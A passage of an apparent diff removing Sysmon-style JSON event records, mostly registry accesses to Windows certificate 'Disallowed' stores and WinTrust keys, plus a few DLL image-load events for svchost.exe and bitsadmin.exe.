"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "es.dll", - "image_path": "C:\\Windows\\System32\\es.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "BitsProxy.dll", - "image_path": "C:\\Windows\\System32\\BitsProxy.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "BitsProxy.dll", - "image_path": 
"C:\\Windows\\System32\\BitsProxy.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 